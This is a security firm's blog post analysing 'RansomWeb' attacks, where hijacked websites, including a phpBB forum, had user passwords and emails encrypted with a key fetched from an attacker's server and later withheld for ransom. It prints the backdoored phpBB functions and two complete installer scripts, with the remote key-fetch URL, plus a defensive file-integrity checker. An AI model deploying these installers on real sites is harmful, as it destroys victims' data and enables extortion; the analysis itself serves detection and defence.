RansomWeb: emerging website threat that may outshine DDoS, data theft and defacements?

Wednesday, January 28, 2015 By

More and more people become victims of ransomware, malware that encrypts your data and demands money to decrypt it. A new trend shows that cybercriminals will now target your website as well to extract a ransom payment from you.


In December 2014, our security experts discovered a very interesting case of a compromised financial company website: the website was out of service and displaying a database error, while the website owner received an email asking for a ransom to “decrypt the database”. The web application in question was fairly simple and small, but very important to the company's business, which could afford neither to suspend it nor to announce its compromise. Our careful investigation revealed the following:

  • The web application had been compromised six months earlier: several server scripts were modified to encrypt data before inserting it into the database and to decrypt it after reading it back. A sort of “on-the-fly” patching invisible to web application users.
  • Only the most critical fields of the database tables were encrypted (probably to limit the impact on web application performance). All previously existing database records were encrypted accordingly.
  • The encryption key was stored on a remote web server accessible only via HTTPS (probably to avoid key interception by traffic monitoring systems).
  • For six months the hackers silently waited, while backups were being overwritten by recent versions of the database.
  • On day X, the hackers removed the key from the remote server. The database became unusable, the website went out of service, and the hackers demanded a ransom for the encryption key.

We were sure that it was an isolated example of a sophisticated APT targeting a specific company; however, last week we faced another similar case. One of our customers, an SMB, was blackmailed after its… phpBB forum went out of order. The forum was used as the main platform for customer support and was therefore important to the customer.

It was the latest phpBB, 3.1.2, released on the 25th of November 2014. No user could log in (including forum moderators and admins). The forum was online, but all functions that require a forum user to be authenticated didn’t work. Our thorough investigation revealed that the forum engine had been patched in such a way that users’ passwords and emails were encrypted “on the fly” between the web application and the database.

The following files were modified:

1. File “factory.php” has its “sql_fetchrow()” function modified so that the result of the SQL query “$result = $this->get_driver()->sql_fetchrow($query_id);” in the array “result” will have decrypted values of the “user_password” and “user_email” table fields:

// Transparent decryption of the two backdoored columns on every row fetched
if (isset($result['user_password'])) {
    $result['user_password'] = $cipher->decrypt($result['user_password']);
}
if (isset($result['user_email'])) {
    $result['user_email'] = $cipher->decrypt($result['user_email']);
}

2. File “functions_user.php” has a modified version of the “user_add” function to add encryption:

// New accounts are written with the password hash and email already encrypted
$sql_ary = array(
    'username'        => $user_row['username'],
    'username_clean'  => $username_clean,
    'user_password'   => (isset($user_row['user_password'])) ?
        $cipher->encrypt($user_row['user_password']) : $cipher->encrypt(''),
    'user_email'      => $cipher->encrypt(strtolower($user_row['user_email'])),
    'user_email_hash' => phpbb_email_hash($user_row['user_email']),
    'group_id'        => $user_row['group_id'],
    'user_type'       => $user_row['user_type'],
);

3. File “ucp_activate.php” has a modified version of the function “main()”:

// Account activation stores the new password in encrypted form
$sql_ary = array(
    'user_actkey'         => '',
    'user_password'       => $cipher->encrypt($user_row['user_newpasswd']),
    'user_newpasswd'      => '',
    'user_login_attempts' => 0,
);

4. File “ucp_profile.php” has a modified version of the function “main()”:

// Profile updates re-encrypt the email and password before the UPDATE is built
if (sizeof($sql_ary))
{
    $sql_ary['user_email'] = $cipher->encrypt($sql_ary['user_email']);
    $sql_ary['user_password'] = $cipher->encrypt($sql_ary['user_password']);

    $sql = 'UPDATE ' . USERS_TABLE . '
        SET ' . $db->sql_build_array('UPDATE', $sql_ary) . '
        WHERE user_id = ' . $user->data['user_id'];
    $db->sql_query($sql);
}

5. File “config.php” had the following modification:

class Cipher {
    private $securekey, $iv;
    function __construct($textkey) {
        $this->securekey = hash('sha256', $textkey, TRUE);
        $this->iv = mcrypt_create_iv(32);
    }
    function encrypt($input) {
        return base64_encode(mcrypt_encrypt(MCRYPT_RIJNDAEL_256,
            $this->securekey, $input, MCRYPT_MODE_ECB, $this->iv));
    }
    function decrypt($input) {
        return trim(mcrypt_decrypt(MCRYPT_RIJNDAEL_256,
            $this->securekey, base64_decode($input), MCRYPT_MODE_ECB, $this->iv));
    }
}
// The key never touches the local disk: it is fetched from the attackers' server on every request
$key = file_get_contents('https://103.13.120.108/sfdoif89d7sf8d979dfgf/sdfds90f8d9s0f8d0f89.txt');
$cipher = new Cipher($key);

Moreover, we found two backdoor installation scripts left by the hackers on the server that allow backdooring any phpBB forum with just a couple of clicks. The first installer patches the "config.php" file to add the "Cipher" class that encrypts and decrypts data with the PHP "mcrypt_encrypt()" function, with the encryption key stored on a remote server:

<?php
// Appends the Cipher class and the remote key fetch to the forum's config.php
$file = '../config.php';
$txt = "\n".'class Cipher {
 private $securekey, $iv;
 function __construct($textkey) {
  $this->securekey = hash(\'sha256\',$textkey,TRUE);
  $this->iv = mcrypt_create_iv(32);
 }
 function encrypt($input) {
  return base64_encode(mcrypt_encrypt(MCRYPT_RIJNDAEL_256,
     $this->securekey, $input, MCRYPT_MODE_ECB, $this->iv));
  }
 function decrypt($input) {
  return trim(mcrypt_decrypt(MCRYPT_RIJNDAEL_256,
     $this->securekey, base64_decode($input), MCRYPT_MODE_ECB, $this->iv));
 }
}
$key=file_get_contents(\'https://103.13.120.108/sfdoif89d7sf8d979dfgf/sdfds90f8d9s0f8d0f89.txt\');
$cipher=new Cipher($key);'
."\n";
if (FALSE !== file_put_contents($file, $txt, FILE_APPEND | LOCK_EX)) {
 echo "DONE!";
};

The second installer iterates over all existing phpBB users to encrypt their emails and passwords, and replaces the above-mentioned phpBB files with backdoored copies:

<?php
// Bootstraps phpBB so that $db and the already-patched config.php ($cipher) are available
define('IN_PHPBB', true);
$phpbb_root_path = (defined('PHPBB_ROOT_PATH')) ? PHPBB_ROOT_PATH : '../';
$phpEx = substr(strrchr(__FILE__, '.'), 1);
include($phpbb_root_path . 'common.' . $phpEx);
include($phpbb_root_path . 'includes/functions_display.' . $phpEx);
// Encrypts every existing user's password hash and email in place
$sql = 'SELECT user_id, user_password, user_email FROM ' . USERS_TABLE;
$result = $db->sql_query($sql);
while ($row = $db->sql_fetchrow($result))
{
 $sql2 = 'UPDATE ' . USERS_TABLE . '
  SET
   user_password = "' . $cipher->encrypt($row['user_password']) . '",
   user_email = "' . $cipher->encrypt($row['user_email']) . '"
  WHERE user_id = ' . $row['user_id'];
 $result2 = $db->sql_query($sql2);
}
echo "SQL UPDATED!<br>";
// Overwrites the four forum files with the backdoored copies shipped alongside the installer
copy('factory.php', '../phpbb/db/driver/factory.php');
copy('functions_user.php', '../includes/functions_user.php');
copy('ucp_activate.php', '../includes/ucp/ucp_activate.php');
copy('ucp_profile.php', '../includes/ucp/ucp_profile.php');
echo "FILES UPDATED!";

The attackers waited for two months and then simply removed the key from the remote server. Later we discovered that phpBB was compromised via a stolen FTP password; the security of the phpBB software itself is not related to the incident in any way.

For the moment, no antivirus software detects even the installers as known malware.

Following the wave of ransomware attacks, we called this hacking technique RansomWeb. Let’s try to make a brief analysis of RansomWeb attacks:

Potential Opportunities of RansomWeb:

  • Unlike DDoS attacks, they can have a lasting impact on web application availability.
  • May be used not only for blackmail but for long-term website destruction.
  • Backups cannot help much, as the database will be backed up in encrypted form, while the encryption key is stored remotely and will not be backed up.
  • Almost impossible to recover from the attack without paying the ransom; many victims won’t have a choice but to pay the hackers.
  • Hosting companies are not ready for this new challenge and probably won’t be able to help their customers.

Potential Weaknesses of RansomWeb:

  • Can be easily detected by a file integrity monitor (however, very few companies do file integrity monitoring for web applications that may change every day).
  • Pretty difficult to encrypt an entire database without damaging web application functionality and/or speed (nevertheless, even one unrecoverable DB field may ruin a web application).
  • May be detected pretty quickly when used on a regularly updated web application.
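The first weakness above, detection by a file integrity monitor, as an added example that is not part of the original post: a baseline of SHA-256 hashes over a PHP tree, a comparison run that reports modified and added scripts, and a content heuristic for the two traits of the backdoored config.php described above (a key fetched over HTTPS at request time and mcrypt calls). The directory layout, the patterns and the placeholder key host are constructed for this example.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Hypothetical heuristics for this example, not a vendor signature set: a key pulled from a
# remote server at request time, and mcrypt calls wired into application code.
SUSPICIOUS = [re.compile(r"file_get_contents\(\s*['\"]https?://"),
              re.compile(r"mcrypt_(encrypt|decrypt)\(")]

def build_baseline(root):
    """Relative path -> SHA-256 for every .php file under root (take it from a known-good deploy)."""
    return {str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in Path(root).rglob("*.php")}

def compare(root, baseline):
    """Return (modified, added, removed) relative paths of the live tree versus the baseline."""
    current = build_baseline(root)
    modified = sorted(p for p in baseline if p in current and current[p] != baseline[p])
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    return modified, added, removed

def scan(root, rel_paths):
    """For each flagged file, list the heuristic patterns its contents match."""
    hits = {}
    for rel in rel_paths:
        text = Path(root, rel).read_text(errors="replace")
        matched = [p.pattern for p in SUSPICIOUS if p.search(text)]
        if matched:
            hits[rel] = matched
    return hits

def write(root, rel, text, append=False):
    path = Path(root, rel)
    path.parent.mkdir(parents=True, exist_ok=True)
    with path.open("a" if append else "w") as f:
        f.write(text)

def demo():
    """Constructed scenario: baseline a tiny phpBB-like tree, then tamper with config.php."""
    root = tempfile.mkdtemp()
    write(root, "config.php", "<?php\n$dbhost = 'localhost';\n")
    write(root, "includes/functions_user.php", "<?php\nfunction user_add($r) {}\n")
    baseline = build_baseline(root)
    # Simulated tampering with a placeholder host (not a real indicator)
    write(root, "config.php", "$key=file_get_contents('https://KEY-SERVER-PLACEHOLDER/k.txt');\n", True)
    modified, added, removed = compare(root, baseline)
    return modified, added, removed, scan(root, modified)
```

In production the baseline would be written at deploy time and stored off the web server, and the comparison scheduled after every legitimate update so that the daily churn mentioned above does not drown the alert.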

Ilia Kolochenko, CEO of High-Tech Bridge says: "We are probably facing a new emerging threat for websites that may outshine defacements and DDoS attacks. RansomWeb attacks may cause unrepairable damage; they are very easy to cause and pretty difficult to prevent. Days when hackers were attacking websites for glory or fun are over, now financial profit drives them. The era of web blackmailing, racket and chantage is about to start."

Marsel Nizamutdinov, Chief Research Officer, adds: "Cyber blackmailing and ransomware have existed for a while already, however websites are a new vector of chantage. We have tens of millions of vulnerable web applications with critical data, and hackers will definitely not miss such a great opportunity to make money on negligent website administrators."

Ilia Kolochenko continues: "The only way to prevent such attacks is to combine regular security monitoring with web application penetration testing."

Will RansomWeb attacks outperform DDoS, defacement and data theft attacks against websites in efficiency and profitability? Quite probably this question will be answered in 2015.


High-Tech Bridge Security Research Team regularly writes about web and mobile application security, privacy, Machine Learning and AI.

User Comments
6 responses to "RansomWeb: emerging website threat that may outshine DDoS, data theft and defacements?"
Anonymous 2015-01-29 01:49:02 UTC
Did you determine how the scripts were modified? I mean what led to the access that allowed the attackers to modify the files and encrypt the DB?
If simple controls and operational security would have protected the victims, that should be added to the article as an update.
Greg Augustinus 2015-01-31 12:36:43 UTC
Admin access should be restricted to only ssh/sftp sessions using PKI, so useless even if password known/brute forced. Of course one must keep the keys safe and it's no protection against vulnerabilities in the web app/os itself, but patching/scanning/pen testing and finally log monitoring do the rest.
Anonymous 2015-02-04 02:26:06 UTC
Anonymous wrote:
Did you determine how the scripts were modified? I mean what led to the access that allowed the attackers to modify the files and encrypt the DB?
If simple controls and operational security would have protected the victims, that should be added to the article as an update.
It's right there under the code snips:
"Later we discovered that phpBB was compromised via stolen FTP password."

This is also relevant to @GregAugustinus because, whilst providing good advice about using PKI for SSH, this wouldn't have helped in this case...
DBA 2015-02-07 21:28:03 UTC
Financial site, mission critical app...running PHPBB ? Huge lesson to be seen there.
Kail 2015-02-07 21:41:07 UTC
DBA wrote:
Financial site, mission critical app...running PHPBB ? Huge lesson to be seen there.
LOL, nope it was the second victim who was running phpBB
Jim Weiler 2015-11-09 14:36:51 UTC
It sounds like another indicator would be the script server making outbound connections to the remote server with the key, every time a record that was maliciously encrypted was accessed. Is that what is meant by 'May be detected pretty quickly when used on regularly-updated web application.'